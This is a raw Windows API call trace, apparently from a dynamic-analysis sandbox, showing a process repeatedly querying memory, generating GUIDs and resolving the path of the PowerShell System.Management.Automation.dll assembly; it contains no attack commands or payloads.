	[0054.760] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.761] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.761] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.761] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.763] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.763] VirtualQuery (in: lpAddress=0x22cd7c, lpBuffer=0x22dd7c, dwLength=0x1c | out: lpBuffer=0x22dd7c*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.763] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.764] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.764] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.765] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.765] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x551f3a7f, Data2=0x241a, Data3=0x4a52, Data4=([0]=0x96, [1]=0xb5, [2]=0x16, [3]=0x87, [4]=0xc6, [5]=0x9b, [6]=0x6, [7]=0xf4))) returned 0x0
	[0054.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.765] GetLastError () returned 0x0
	[0054.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.765] GetLastError () returned 0x0
	[0054.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.765] GetLastError () returned 0x0
	[0054.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.765] GetLastError () returned 0x0
	[0054.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.765] GetLastError () returned 0x0
	[0054.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.766] GetLastError () returned 0x0
	[0054.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.766] GetLastError () returned 0x0
	[0054.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.766] GetLastError () returned 0x0
	[0054.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.766] GetLastError () returned 0x0
	[0054.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.766] GetLastError () returned 0x0
	[0054.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.766] GetLastError () returned 0x0
	[0054.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.766] GetLastError () returned 0x0
	[0054.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.766] GetLastError () returned 0x0
	[0054.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.767] GetLastError () returned 0x0
	[0054.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.767] GetLastError () returned 0x0
	[0054.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.767] GetLastError () returned 0x0
	[0054.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.767] GetLastError () returned 0x0
	[0054.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.767] GetLastError () returned 0x0
	[0054.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.767] GetLastError () returned 0x0
	[0054.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.767] GetLastError () returned 0x0
	[0054.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.767] GetLastError () returned 0x0
	[0054.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.767] GetLastError () returned 0x0
	[0054.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.767] GetLastError () returned 0x0
	[0054.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.768] GetLastError () returned 0x0
	[0054.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.768] GetLastError () returned 0x0
	[0054.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.768] GetLastError () returned 0x0
	[0054.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.768] GetLastError () returned 0x0
	[0054.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.768] GetLastError () returned 0x0
	[0054.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.768] GetLastError () returned 0x0
	[0054.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.768] GetLastError () returned 0x0
	[0054.769] VirtualQuery (in: lpAddress=0x22cf40, lpBuffer=0x22df40, dwLength=0x1c | out: lpBuffer=0x22df40*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.769] GetLastError () returned 0x0
	[0054.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.769] GetLastError () returned 0x0
	[0054.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.769] GetLastError () returned 0x0
	[0054.769] VirtualQuery (in: lpAddress=0x22cf40, lpBuffer=0x22df40, dwLength=0x1c | out: lpBuffer=0x22df40*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.769] GetLastError () returned 0x0
	[0054.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.769] GetLastError () returned 0x0
	[0054.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.770] GetLastError () returned 0x0
	[0054.770] VirtualQuery (in: lpAddress=0x22cf40, lpBuffer=0x22df40, dwLength=0x1c | out: lpBuffer=0x22df40*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.770] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.771] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.772] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.818] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.818] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.819] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.819] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.819] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.820] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.820] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.821] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.821] VirtualQuery (in: lpAddress=0x22cd7c, lpBuffer=0x22dd7c, dwLength=0x1c | out: lpBuffer=0x22dd7c*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.822] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.823] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.823] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.823] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.824] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x3fd22c32, Data2=0xdbcb, Data3=0x46b9, Data4=([0]=0xa4, [1]=0x79, [2]=0xcb, [3]=0x79, [4]=0x63, [5]=0x89, [6]=0x83, [7]=0x5a))) returned 0x0
	[0054.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.824] GetLastError () returned 0x0
	[0054.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.824] GetLastError () returned 0x0
	[0054.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.824] GetLastError () returned 0x0
	[0054.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.824] GetLastError () returned 0x0
	[0054.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.824] GetLastError () returned 0x0
	[0054.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.824] GetLastError () returned 0x0
	[0054.825] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x55e0304c, Data2=0xa1cc, Data3=0x48b8, Data4=([0]=0x9b, [1]=0x32, [2]=0xf8, [3]=0xe6, [4]=0x27, [5]=0x10, [6]=0xb, [7]=0x12))) returned 0x0
